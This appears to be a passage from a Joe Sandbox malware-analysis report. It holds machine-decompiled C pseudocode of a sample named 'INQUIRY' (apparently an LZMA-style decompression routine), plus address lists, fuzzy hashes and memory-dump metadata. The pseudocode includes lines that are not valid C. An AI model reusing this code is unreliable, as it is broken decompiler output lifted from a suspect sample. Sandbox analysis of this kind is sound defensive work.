                          							__eax = __ebx;
                          							__ecx = __ebx >> 1;
                          							__eax = __ebx & 0x00000001;
                          							__ecx = (__ebx >> 1) - 1;
                          							__al = __al | 0x00000002;
                          							__eax = (__ebx & 0x00000001) << __cl;
                          							__eflags = __ebx - 0xe;
                          							_v48 = __eax;
                          							if(__ebx >= 0xe) {
                          								__ebx = 0;
                          								_v76 = __ecx;
                          								L105:
                          								__eflags = _v76;
                          								if(_v76 <= 0) {
                          									__eax = __eax + __ebx;
                          									_v68 = 4;
                          									_v48 = __eax;
                          									__eax = _v8;
                          									__eax = _v8 + 0x644;
                          									__eflags = __eax;
                          									L111:
                          									__ebx = 0;
                          									_v92 = __eax;
                          									_v84 = 1;
                          									_v72 = 0;
                          									_v76 = 0;
                          									L115:
                          									__eax = _v68;
                          									__eflags = _v76 - _v68;
                          									if(_v76 >= _v68) {
                          										_t397 =  &_v48;
                          										 *_t397 = _v48 + __ebx;
                          										__eflags =  *_t397;
                          										goto L122;
                          									}
                          									__eax = _v84;
                          									_v20 = _v20 >> 0xb;
                          									__edi = _v84 + _v84;
                          									__eax = _v92;
                          									__esi = __edi + __eax;
                          									_v88 = __esi;
                          									__ax =  *__esi;
                          									__ecx = __ax & 0x0000ffff;
                          									__edx = (_v20 >> 0xb) * __ecx;
                          									__eflags = _v16 - __edx;
                          									if(_v16 >= __edx) {
                          										__ecx = 0;
                          										_v20 = _v20 - __edx;
                          										__ecx = 1;
                          										_v16 = _v16 - __edx;
                          										__ebx = 1;
                          										__ecx = _v76;
                          										__ebx = 1 << __cl;
                          										__ecx = 1 << __cl;
                          										__ebx = _v72;
                          										__ebx = _v72 | __ecx;
                          										__cx = __ax;
                          										__cx = __ax >> 5;
                          										__eax = __eax - __ecx;
                          										__edi = __edi + 1;
                          										__eflags = __edi;
                          										_v72 = __ebx;
                          										 *__esi = __ax;
                          										_v84 = __edi;
                          									} else {
                          										_v20 = __edx;
                          										0x800 = 0x800 - __ecx;
                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          										_v84 = _v84 << 1;
                          										 *__esi = __dx;
                          									}
                          									__eflags = _v20 - 0x1000000;
                          									if(_v20 >= 0x1000000) {
                          										L114:
                          										_t374 =  &_v76;
                          										 *_t374 = _v76 + 1;
                          										__eflags =  *_t374;
                          										goto L115;
                          									} else {
                          										goto L112;
                          									}
                          								}
                          								__ecx = _v16;
                          								__ebx = __ebx + __ebx;
                          								_v20 = _v20 >> 1;
                          								__eflags = _v16 - _v20;
                          								_v72 = __ebx;
                          								if(_v16 >= _v20) {
                          									__ecx = _v20;
                          									_v16 = _v16 - _v20;
                          									__ebx = __ebx | 0x00000001;
                          									__eflags = __ebx;
                          									_v72 = __ebx;
                          								}
                          								__eflags = _v20 - 0x1000000;
                          								if(_v20 >= 0x1000000) {
                          									L104:
                          									_t344 =  &_v76;
                          									 *_t344 = _v76 - 1;
                          									__eflags =  *_t344;
                          									goto L105;
                          								} else {
                          									goto L102;
                          								}
                          							}
                          							__edx = _v8;
                          							__eax = __eax - __ebx;
                          							_v68 = __ecx;
                          							__eax = _v8 + 0x55e + __eax * 2;
                          							goto L111;
                          						case 0x1a:
                          							L58:
                          							__eflags = _v104;
                          							if(_v104 == 0) {
                          								_v140 = 0x1a;
                          								goto L173;
                          							}
                          							__ecx = _v108;
                          							__al = _v96;
                          							__edx = _v12;
                          							_v100 = _v100 + 1;
                          							_v108 = _v108 + 1;
                          							_v104 = _v104 - 1;
                          							 *_v108 = __al;
                          							__ecx = _v24;
                          							 *(_v12 + __ecx) = __al;
                          							__eax = __ecx + 1;
                          							__edx = 0;
                          							_t197 = __eax % _v120;
                          							__eax = __eax / _v120;
                          							__edx = _t197;
                          							goto L82;
                          						case 0x1b:
                          							L78:
                          							__eflags = _v104;
                          							if(_v104 == 0) {
                          								_v140 = 0x1b;
                          								goto L173;
                          							}
                          							__eax = _v24;
                          							__eax = _v24 - _v48;
                          							__eflags = __eax - _v120;
                          							if(__eax >= _v120) {
                          								__eax = __eax + _v120;
                          								__eflags = __eax;
                          							}
                          							__edx = _v12;
                          							__cl =  *(__edx + __eax);
                          							__eax = _v24;
                          							_v96 = __cl;
                          							 *(__edx + __eax) = __cl;
                          							__eax = __eax + 1;
                          							__edx = 0;
                          							_t280 = __eax % _v120;
                          							__eax = __eax / _v120;
                          							__edx = _t280;
                          							__eax = _v108;
                          							_v100 = _v100 + 1;
                          							_v108 = _v108 + 1;
                          							_t289 =  &_v104;
                          							 *_t289 = _v104 - 1;
                          							__eflags =  *_t289;
                          							 *_v108 = __cl;
                          							L82:
                          							_v24 = __edx;
                          							goto L83;
                          						case 0x1c:
                          							while(1) {
                          								L126:
                          								__eflags = _v104;
                          								if(_v104 == 0) {
                          									break;
                          								}
                          								__eax = _v24;
                          								__eax = _v24 - _v48;
                          								__eflags = __eax - _v120;
                          								if(__eax >= _v120) {
                          									__eax = __eax + _v120;
                          									__eflags = __eax;
                          								}
                          								__edx = _v12;
                          								__cl =  *(__edx + __eax);
                          								__eax = _v24;
                          								_v96 = __cl;
                          								 *(__edx + __eax) = __cl;
                          								__eax = __eax + 1;
                          								__edx = 0;
                          								_t420 = __eax % _v120;
                          								__eax = __eax / _v120;
                          								__edx = _t420;
                          								__eax = _v108;
                          								_v108 = _v108 + 1;
                          								_v104 = _v104 - 1;
                          								_v52 = _v52 - 1;
                          								__eflags = _v52;
                          								 *_v108 = __cl;
                          								_v24 = _t420;
                          								if(_v52 > 0) {
                          									continue;
                          								} else {
                          									L83:
                          									_v140 = 2;
                          									goto L3;
                          								}
                          							}
                          							_v140 = 0x1c;
                          							L173:
                          							_push(0x22);
                          							_pop(_t574);
                          							memcpy(_v148,  &_v140, _t574 << 2);
                          							return 0;
                          					}
                          				}
                          				L174:
                          				_t538 = _t537 | 0xffffffff;
                          				return _t538;
                          			}










































                          0x00405ead
                          0x00405eb4
                          0x00405eba
                          0x00405ec0
                          0x00000000
                          0x00405ec4
                          0x00405ed0
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00000000
                          0x00405ee6
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efb
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f46
                          0x00405f49
                          0x00405f71
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4b
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f63
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fba
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fbf
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fdc
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406022
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066ca
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406700
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406709
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x00000000
                          0x004068bc
                          0x00406719
                          0x00406720
                          0x00406728
                          0x00406728
                          0x00406728
                          0x0040672b
                          0x0040672e
                          0x0040672e
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x00000000
                          0x004060d9
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x004060bc
                          0x0040609e
                          0x004060a1
                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x00000000
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x00000000
                          0x00000000
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x00000000
                          0x00000000
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x00000000
                          0x00406424
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x00000000
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00406734
                          0x00406734
                          0x00000000
                          0x00406734
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x004068d2
                          0x004068d8
                          0x004068da
                          0x004068e1
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                          • Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
                          • Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                          • Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E004062EB() {
                          				signed int _t539;
                          				unsigned short _t540;
                          				signed int _t541;
                          				void _t542;
                          				signed int _t543;
                          				signed int _t544;
                          				signed int _t573;
                          				signed int _t576;
                          				signed int _t597;
                          				signed int* _t614;
                          				void* _t621;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t621 - 0x40) != 1) {
                          						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                          						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                          						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                          						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                          						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                          						_t539 =  *(_t621 - 4) + 0x664;
                          						 *(_t621 - 0x58) = _t539;
                          						goto L68;
                          					} else {
                          						 *(__ebp - 0x84) = 8;
                          						while(1) {
                          							L132:
                          							 *(_t621 - 0x54) = _t614;
                          							while(1) {
                          								L133:
                          								_t540 =  *_t614;
                          								_t597 = _t540 & 0x0000ffff;
                          								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                          								if( *(_t621 - 0xc) >= _t573) {
                          									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                          									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                          									 *(_t621 - 0x40) = 1;
                          									_t541 = _t540 - (_t540 >> 5);
                          									 *_t614 = _t541;
                          								} else {
                          									 *(_t621 - 0x10) = _t573;
                          									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                          									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                          								}
                          								if( *(_t621 - 0x10) >= 0x1000000) {
                          									goto L139;
                          								}
                          								L137:
                          								if( *(_t621 - 0x6c) == 0) {
                          									 *(_t621 - 0x88) = 5;
                          									L170:
                          									_t576 = 0x22;
                          									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                          									_t544 = 0;
                          									L172:
                          									return _t544;
                          								}
                          								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                          								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                          								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                          								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                          								L139:
                          								_t542 =  *(_t621 - 0x84);
                          								while(1) {
                          									 *(_t621 - 0x88) = _t542;
                          									while(1) {
                          										L1:
                          										_t543 =  *(_t621 - 0x88);
                          										if(_t543 > 0x1c) {
                          											break;
                          										}
                          										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
                          											case 0:
                          												if( *(_t621 - 0x6c) == 0) {
                          													goto L170;
                          												}
                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                          												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                          												_t543 =  *( *(_t621 - 0x70));
                          												if(_t543 > 0xe1) {
                          													goto L171;
                          												}
                          												_t547 = _t543 & 0x000000ff;
                          												_push(0x2d);
                          												asm("cdq");
                          												_pop(_t578);
                          												_push(9);
                          												_pop(_t579);
                          												_t617 = _t547 / _t578;
                          												_t549 = _t547 % _t578 & 0x000000ff;
                          												asm("cdq");
                          												_t612 = _t549 % _t579 & 0x000000ff;
                          												 *(_t621 - 0x3c) = _t612;
                          												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                          												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                          												_t620 = (0x300 << _t612 + _t617) + 0x736;
                          												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                          													L10:
                          													if(_t620 == 0) {
                          														L12:
                          														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                          														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                          														goto L15;
                          													} else {
                          														goto L11;
                          													}
                          													do {
                          														L11:
                          														_t620 = _t620 - 1;
                          														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                          													} while (_t620 != 0);
                          													goto L12;
                          												}
                          												if( *(_t621 - 4) != 0) {
                          													GlobalFree( *(_t621 - 4));
                          												}
                          												_t543 = GlobalAlloc(0x40, 0x600); // executed
                          												 *(_t621 - 4) = _t543;
                          												if(_t543 == 0) {
                          													goto L171;
                          												} else {
                          													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                          													goto L10;
                          												}
                          											case 1:
                          												L13:
                          												__eflags =  *(_t621 - 0x6c);
                          												if( *(_t621 - 0x6c) == 0) {
                          													 *(_t621 - 0x88) = 1;
                          													goto L170;
                          												}
                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                          												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                          												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                          												_t45 = _t621 - 0x48;
                          												 *_t45 =  *(_t621 - 0x48) + 1;
                          												__eflags =  *_t45;
                          												L15:
                          												if( *(_t621 - 0x48) < 4) {
                          													goto L13;
                          												}
                          												_t555 =  *(_t621 - 0x40);
                          												if(_t555 ==  *(_t621 - 0x74)) {
                          													L20:
                          													 *(_t621 - 0x48) = 5;
                          													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                          													goto L23;
                          												}
                          												 *(_t621 - 0x74) = _t555;
                          												if( *(_t621 - 8) != 0) {
                          													GlobalFree( *(_t621 - 8));
                          												}
                          												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                          												 *(_t621 - 8) = _t543;
                          												if(_t543 == 0) {
                          													goto L171;
                          												} else {
                          													goto L20;
                          												}
                          											case 2:
                          												L24:
                          												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                          												 *(_t621 - 0x84) = 6;
                          												 *(_t621 - 0x4c) = _t562;
                          												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                          												goto L132;
                          											case 3:
                          												L21:
                          												__eflags =  *(_t621 - 0x6c);
                          												if( *(_t621 - 0x6c) == 0) {
                          													 *(_t621 - 0x88) = 3;
                          													goto L170;
                          												}
                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
